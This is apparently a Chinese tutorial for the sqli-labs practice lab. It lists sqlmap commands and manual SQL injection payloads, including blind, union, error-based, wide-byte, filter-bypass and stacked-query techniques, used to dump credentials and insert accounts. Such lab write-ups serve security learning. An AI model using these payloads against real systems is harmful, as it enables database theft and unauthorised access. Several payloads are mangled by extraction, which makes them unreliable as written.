提示:手工注入就不写了,发现有很多了,质量也还可以,今天就写个sqlmap通关教程吧

文章目录

  • 前言
  • 一、sqli-labs1-10(get型)
  • 二、sqli-labs 11-16(post型基础注入)
  • 三、与BP联动
    • 1.sqli-labs 17(加选项–data数据添加)
    • 2.sqli-labs 18(`–level=3 –risk=3`User-agent做为注入点)
    • 3.sqli-labs 19 (refer字段做为注入点)
    • 4.sqli-labs 20 (cookie注入)
    • 5.sqli-labs 21(进行了cookie base64编码`–tamper=”base64encode.py”`)
    • 6.sqli-labs 22 (cookie双引号编码base64)
    • 7.sqli-labs 23 (过滤注释符)
    • 8.sqli-labs 24 (污染数据库)
    • 9.sqli-labs 25 (过滤OR,AND)
    • 10.sqli-labs 26 (过滤了运算符,注释,空格)
    • 11.sqli-labs 25a (数字型注入,与25没啥区别)
    • 12.sqli-labs 26a (跟26差不多,就多了括号)
    • 13.sqli-labs 27 (过滤select和union)
    • 14.sqli-labs 27a (多了双引号比27盲注)
    • 15.sqli-labs 28(过滤了union和select以及空格,注释)
    • 16.sqli-labs 28a (过滤了union+selcect 过滤规则与27有不同)
    • 17.sqli-labs29 (校验第一个参数,构造第二个绕过)
    • 18.sqli-labs 30 (同29,将单引号换成双引号)
    • 19 .sqli-labs 31 (同30,多了一个括号)
    • 20.sqli-labs 32 (使用函数转义,但数据库采用GBK可通过宽字节注入)
    • 21.sqli-labs 33 (同32 宽字节解决问题)也可用sqlmap
    • 22.sqli-labs 34 (利用addslashes()进行转义,宽字节绕过)
    • 23.sqli-labs 35 (利用addslashes,但参数没引号,联合查询直接过)
    • 24.sqli-labs 36 (mysql_real_escape_string函数对于特殊字符进行转义,id参数无单引号)同32
    • 25.sqli-labs 37 (mysql_real_escape_string函数对于账户和密码都进行转义,使用宽字节注入就行)同34
    • 26.sqli-labs 38 (存在mysqli_multi_query函数,该函数支持多条sql语句同时进行。)
    • 27.sqli-labs 39 (id参数是整数,联合注入过。)
    • 28.sqli-labs 40 (id参数是单引号加括号闭合,使用联合注入)
    • 29.sqli-labs 41 同39
    • 30.sqli-labs 42 (堆叠注入)
    • 31.sqli-labs 43(密码参数是单引号和括号闭合的堆叠注入。)同42
    • 32.sqli-labs 44 同42
    • 33.sqli-labs 45 同43
    • 34.sqli-labs 46 (使用sort,利用updataxml报错过)
    • 35.sqli-labs 47 同46
    • 36.sqli-labs 48 (延时注入)同46
    • 37.sqli-labs 49 (延时注入)同47
    • 38.sqli-labs 50 (updatexml报错注入,多语句执行函数,延时注入)
    • 39.sqli-labs 51 (报错延时堆叠)
    • 40.sqli-labs 52 (堆叠,延时)
    • 41.sqli-labs 53 (堆叠,延时)
    • 42.sqli-labs 54(因限制次数不可使用sqlmap)
    • 43.sqli-labs 55 (因限制次数不可使用sqlmap,id为加括号整数)
    • 44.sqli-labs 56 (因限制次数不可使用sqlmap,id为单引号加括号)
    • 45.sqli-labs 57 (因限制次数不可使用sqlmap,id为双引号加括号)
    • 46.sqli-labs 58 (目标返回数据被处理,无法使用sqlmap)
    • 47.sqli-labs 59 五十九关和五十八关一样使用报错注入,id是整数型.同58
    • 48.sqli-labs 60 六十关根据报错信息可知id参数是双引号加括号。同58
    • 49.sqli-labs 61 六十一关根据报错信息可知id参数是单引号加两个括号。同58
    • 50.sqli-labs 62 六十二关没有报错显示,可以使用布尔盲注和时间注入。id参数是单引号加括号。
    • 51.sqli-labs 63 六十三关没有报错显示,可以使用布尔盲注和时间注入。id参数是单引号。
    • 55.sqli-labs 64 同62,id参数是两个括号的整数型。
    • 56.sqli-labs 65 同62,id参数是一个括号的整数型。
    • 以上除明确过滤,或次数限制,或数据处理,均可使用sqlmap进行注入,举个
  • 总结

前言


提示:我只是跑表名来表示我注入成功,具体内容选项参加sqlmap使用帮助

一、sqli-labs1-10(get型)

太简单了,给个模板,大家自己改一下关数即可,跑出表名即为成功

sqlmap -url "http://192.168.0.107/sqli-labs/Less-9/?id=1" --cookie="PHPSESSID=938ba4d9befdd8411a15a447" --batch -dbs


针对一些手工盲注脚本

盲注" />=1'and length((select database()))>9--+#大于号可以换成小于号或者等于号,主要是判断数据库的长度。lenfth()是获取当前数据库名的长度。如果数据库是haha那么length()就是4?id=1'and ascii(substr((select database()),1,1))=115--+#substr("78909",1,1)=7 substr(a,b,c)a是要截取的字符串,b是截取的位置,c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。ascii()是将截取的字符转换成对应的ascii吗,这样我们可以很好确定数字根据数字找到对应的字符。?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+判断所有表名字符长度。?id=1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+逐一判断表名 ?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+判断所有字段名的长度?id=1'and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+逐一判断字段名。 ?id=1' and length((select group_concat(username,password) from users))>109--+判断字段内容长度?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+逐一检测内容。 时间盲注9?id=1' and if(1=1,sleep(5),1)--+判断参数构造。?id=1'and if(length((select database()))>9,sleep(5),1)--+判断数据库名长度 ?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+逐一判断数据库字符?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+判断所有表名长度 ?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+逐一判断表名?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+判断所有字段名的长度 ?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+逐一判断字段名。?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+判断字段内容长度 ?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+逐一检测内容。

二、sqli-labs 11-16(post型基础注入)

-r代表文档,文档内容就是你的post报文,至于报文获得,看个人习惯使用软件,我用的BP

sqlmap -r Post-sqlinjection.txt --batch -dbs


三、与BP联动

1.sqli-labs 17(加选项–data数据添加)

这个值得注意是因为后台对用户名有检验,但是对密码没过滤,密码是诸如点,用户名固定,Dhakkan
把post报文内容拿下来

很明显,用户名给了,只让改密码

sqlmap -url "http://192.168.0.107/sqli-labs/Less-17/" --cookie="PHPSESSID=938ba4d9befdd8411a15a447" --batch --data="uname=Dhakkan&passwd=1&submit=Submit" --dbs

或者

sqlmap -r Post-sqlinjection17ErrorInjection.txt --batch -dbs

你把数据放在里面是一样的

2.sqli-labs 18(--level=3 --risk=3User-agent做为注入点)

这关是把用户代理头部给加进去了,这个地方是注入点,其他做了过滤



sqlmap -url "http://192.168.0.107/sqli-labs/Less-18/" --cookie="PHPSESSID=938ba4d9befdd8411a15a447" --batch --user-agent="1" --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3


一样,使用报文,复制进1.txt里面,之后都用1.txt

sqlmap -r 1.txt --batch -dbs --level=3 --risk=3


3.sqli-labs 19 (refer字段做为注入点)

 sqlmap -r 1.txt --batch -dbs --level=3 --risk=3
sqlmap -url "http://192.168.0.107/sqli-labs/Less-19/" --cookie="PHPSESSID=938ba4d9befdd8411a15a447" --batch --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3 --referer="1"

不放图了,基本结果都是一样的,之后就一个位置两张图

4.sqli-labs 20 (cookie注入)


 sqlmap -r 1.txt --batch -dbs --level=3 --risk=3
sqlmap -url "http://192.168.0.107/sqli-labs/Less-20/index.php" --cookie="uname=dhakkan" --batch --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3

5.sqli-labs 21(进行了cookie base64编码--tamper="base64encode.py"

将我们的注入语句编码即可


只写一个了,-url的大家感兴趣可以自己做一做

sqlmap -r 1.txt --batch -dbs --level=3 --risk=3 --tamper="base64encode.py"

6.sqli-labs 22 (cookie双引号编码base64)

脚本没变,同21

7.sqli-labs 23 (过滤注释符)

过滤了注释符,影响手工注入,不影响sqlmap
手工注入的脚本写一下吧,便于理解,单引号进行闭合

" />=1' or '1'='1这样sql语句就变成 id='1' or '1'='1' ?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),3 or '1'='1 ?id=-1' union select 1,(select group_concat(password,username) from users),3 or '1'='1

sqlmap语句就是一般get型注入,楼上写的有get型

8.sqli-labs 24 (污染数据库)

第二十四关有一个登录页面和注册页面还要一个修改密码页面,该关卡使用得是二次注入,因为登录页面和注册页面对于密码和账户名都使用mysql_real_escape_string函数对于特殊字符进行转义。这里我们利用的是注册页面,因为虽然存在函数对特殊字符进行转义,但只是在调用sql语句时候进行转义,当注册成功后账户密码存在到数据库的时候是没有转义的,以原本数据存入数据库的。这一关主要是修改管理员密码。
手段为注册用户为admin’#进行。详细信息
二次注入sqli-labs24关

http://www.manongjc.com/detail/57-kvexuwhtxaxbkpj.html

9.sqli-labs 25 (过滤OR,AND)

第二十五关根据提示是将or和and这两个替换成空,但是只替换一次。大小写绕过没有用。我们可以采用双写绕过。本次关卡使用联合注入就可以了,information里面涉及or可以写成infoorrmation。但是sqlmap并没有双写绕过脚本,因为过滤规则因情况而定。太过复杂,这个过滤规则比较简单,感兴趣可以自己去做一做。
放一个手工的注入语句

?id=-2' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+

10.sqli-labs 26 (过滤了运算符,注释,空格)

第二十六关将逻辑运算符,注释符以及空格给过滤了,我们需要使用单引号进行闭合,双写绕过逻辑运算符或者使用&&和||替换。空格绕过网上找了些资料,对于绕过空格限制有大把的方式对于空格,有较多的方法:%09 TAB键(水平)、%0a 新建一行、%0c 新的一页、%0d return功能、%0b TAB键(垂直)、%a0 空格,我在windows和kali里面都用不了,可能是因为apache解析不了。只能使用()绕过。报错注入空格使用比较少所以我们可以使用报错注入。

" />=1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1))||'0 爆表?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))||'0 爆字段 ?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(passwoorrd,username))from(users))),1))||'0 爆密码账户

基本上来说,这种过滤之类的大部分是没有脚本的,因为过滤的东西不一样,他可能多过滤了,他可能少过滤了,所以很多都是没脚本的只能手工注入。对于26这种等量代换就行。还有些函数也是一样的。

11.sqli-labs 25a (数字型注入,与25没啥区别)

去掉单引号

12.sqli-labs 26a (跟26差不多,就多了括号)

没有报错,只能用盲注了,盲注的一些代码,参考上面手工盲注脚本,注意替换

13.sqli-labs 27 (过滤select和union)

二十七关没有过滤and和or,过滤了select和union,我们可以大小写绕过以及重写绕过。所以sqlmap没有这种现成脚本,情况太多了。keyi自己针对性写一些。

" />=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))or'0爆表?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))),1))or'0爆字段?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(password,username))from(users))),1))or'0爆密码账户

14.sqli-labs 27a (多了双引号比27盲注)

该关是双引号且页面不显示报错信息。过滤规则和二十七关一样。所以我们需要使用盲注和联合注入。

" />=0"uniunionon%0AseleSelectct%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand"1?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(password,id,username)from%0Ausers%0Awhere%0Aid=3%0Aand"1

%0A代表换行符,不影响语句执行
%3a是冒号":"
%5c是“/”

15.sqli-labs 28(过滤了union和select以及空格,注释)

?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and ('1 ?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1 ?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(password,username)from%0Ausers%0Aand%0A('1

16.sqli-labs 28a (过滤了union+selcect 过滤规则与27有不同)

?id=0')uniunion selecton select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'--+ 

17.sqli-labs29 (校验第一个参数,构造第二个绕过)

?id=1&id=-2%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 爆表 ?id=1&id=-2%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+ 爆字段?id=1&id=-2%27%20union%20select%201,group_concat(password,username),3%20from%20users--+爆密码账户

18.sqli-labs 30 (同29,将单引号换成双引号)

?id=1&id=-2"%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 爆表?id=1&id=-2"%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+ 爆字段 ?id=1&id=-2"%20union%20select%201,group_concat(password,username),3%20from%20users--+

19 .sqli-labs 31 (同30,多了一个括号)

?id=1&id=-2")%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 爆表?id=1&id=-2")%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+ 爆字段 ?id=1&id=-2")%20union%20select%201,group_concat(password,username),3%20from%20users--+

20.sqli-labs 32 (使用函数转义,但数据库采用GBK可通过宽字节注入)

?id=-1%df%27%20union%20select%201,database(),3%20--+ ?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 爆表 ?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+ 爆字段 ?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

21.sqli-labs 33 (同32 宽字节解决问题)也可用sqlmap

22.sqli-labs 34 (利用addslashes()进行转义,宽字节绕过)

1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+爆字段名 1%df%27 union select 1,group_concat(password,username) from users--+ 爆密码账户

23.sqli-labs 35 (利用addslashes,但参数没引号,联合查询直接过)

?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 爆表 ?id=-1%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+ 爆字段 ?id=-1%20union%20select%201,group_concat(password,username),3%20from%20users--+

24.sqli-labs 36 (mysql_real_escape_string函数对于特殊字符进行转义,id参数无单引号)同32

25.sqli-labs 37 (mysql_real_escape_string函数对于账户和密码都进行转义,使用宽字节注入就行)同34

三十七关是post提交,使用mysql_real_escape_string函数对于账户和密码都进行转义,使用宽字节注入就行。和三十四关一样。

1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+爆字段名1%df' union select 1,group_concat(password,username) from users--+ 爆密码账户

26.sqli-labs 38 (存在mysqli_multi_query函数,该函数支持多条sql语句同时进行。)

三十八关其实就是单引号闭合,使用正常单引号闭合就可以进行注入,不过这里可以有另外一种注入就是堆叠注入,因为存在mysqli_multi_query函数,该函数支持多条sql语句同时进行。

?id=1';insert into users(id,username,password) values ('38','less38','hello')--+#向数据表插入自己的账户密码

27.sqli-labs 39 (id参数是整数,联合注入过。)

?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database() ?id=-1%20union%20select%201,group_concat(username,password),3%20from%20users

28.sqli-labs 40 (id参数是单引号加括号闭合,使用联合注入)

?id=-1%27)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ ?id=-1%27)%20union%20select%201,group_concat(username,password),3%20from%20users%20--+

29.sqli-labs 41 同39

30.sqli-labs 42 (堆叠注入)

因为账户进行了转义处理密码没有做处理,数据库没有使用gbk编码不能向上面一样使用宽字节注入,但是存在堆叠注入函数,所以我们可以在密码哪里使用堆叠注入。向数据库里面插入密码账号,这样我们再来使用其进行登录就很简单了。

login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login

31.sqli-labs 43(密码参数是单引号和括号闭合的堆叠注入。)同42

login_user=1&login_password=1'); insert into users(id,username,password) values ('44','less34','123456')--+&mysubmit=Login

32.sqli-labs 44 同42

33.sqli-labs 45 同43

34.sqli-labs 46 (使用sort,利用updataxml报错过)

?sort=1%20and%20(updatexml(1,concat(0x5c,(select%20group_concat(password,username)%20from%20users),0x5c),1))

35.sqli-labs 47 同46

四十七关和四十六差不多,多了一个单引号闭合,可以使用报错注入

36.sqli-labs 48 (延时注入)同46

37.sqli-labs 49 (延时注入)同47

38.sqli-labs 50 (updatexml报错注入,多语句执行函数,延时注入)

五十关和四十六关一样,可以使用updatexml进行报错注入,不过这个里面还可以使用堆叠注入,因为使用了mysqli_multi_query函数,支持多条sql语句执行。也可以延时注入。

39.sqli-labs 51 (报错延时堆叠)

该参数单引号闭合,可以报错注入,可以延时注入,可以堆叠注入。该参数单引号闭合,可以报错注入,可以延时注入,可以堆叠注入。

40.sqli-labs 52 (堆叠,延时)

该参数是整数型,且没有报错显示,只能堆叠注入或者延时注入。该参数是整数型,且没有报错显示,只能堆叠注入或者延时注入。

41.sqli-labs 53 (堆叠,延时)

该参数是字符型,单引号闭合,没有报错显示,可以使用堆叠注入和延时注入。

42.sqli-labs 54(因限制次数不可使用sqlmap)

五十四关翻译页面的英文,得知只有十次输入机会,超过十次所有表名,列名,等等都会随机重置。id参数是单引号闭合就行。
表名列名每个人都不一样

 ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 爆表名?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where%20table_schema=database() and table_name='RND32WPI3I'--+爆列名 ?id=-1%27union%20select%201,group_concat(id,sessid,secret_3QXJ,tryy),3%20from%208fof1zun81--+获取key值


43.sqli-labs 55 (因限制次数不可使用sqlmap,id为加括号整数)

五十五关是有14次机会,id参数是加了括号的整数

" />=-1)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 报表名 ?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='69jwmv27j9'--+ 爆列名?id=-1) union select 1,group_concat(secret_D1DW),3 from 69jwmv27j9--+获取key值

44.sqli-labs 56 (因限制次数不可使用sqlmap,id为单引号加括号)

五十六关和前面两关类似需要单引号和括号

?id=-1')%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+爆表名?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='9ze4qmv307'--+ 爆列名 ?id=-1') union select 1,group_concat(secret_CTVR),3 from 9ze4qmv307--+获取key值 

45.sqli-labs 57 (因限制次数不可使用sqlmap,id为双引号加括号)

五十七关就是双引号闭合

46.sqli-labs 58 (目标返回数据被处理,无法使用sqlmap)

五十八关和前面几关不一样,因为该关卡的数据不是直接数据库里面取得,而是在一个数组里面取出得。所以联合注入是不行得。但是有报错显示,所以可以使用报错注入。

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+爆表名?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='8edjk8ipbk'),0x7e),1)--+爆列名?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_6W8M) from challenges.8edjk8ipbk),0x7e),1)--+

47.sqli-labs 59 五十九关和五十八关一样使用报错注入,id是整数型.同58

48.sqli-labs 60 六十关根据报错信息可知id参数是双引号加括号。同58

49.sqli-labs 61 六十一关根据报错信息可知id参数是单引号加两个括号。同58

50.sqli-labs 62 六十二关没有报错显示,可以使用布尔盲注和时间注入。id参数是单引号加括号。

51.sqli-labs 63 六十三关没有报错显示,可以使用布尔盲注和时间注入。id参数是单引号。

55.sqli-labs 64 同62,id参数是两个括号的整数型。

56.sqli-labs 65 同62,id参数是一个括号的整数型。


以上除明确过滤,或次数限制,或数据处理,均可使用sqlmap进行注入,举个

总结

sql注入步骤
判断字符还是整形
字符型,判断闭合shodua,针对单双引号,哪个报错是哪个
完善闭合语句,根据引号填充,不报错开始注入
审计代码编写注入语句

具体情况,具体分析。
创作不易,有帮助的点个赞,再会!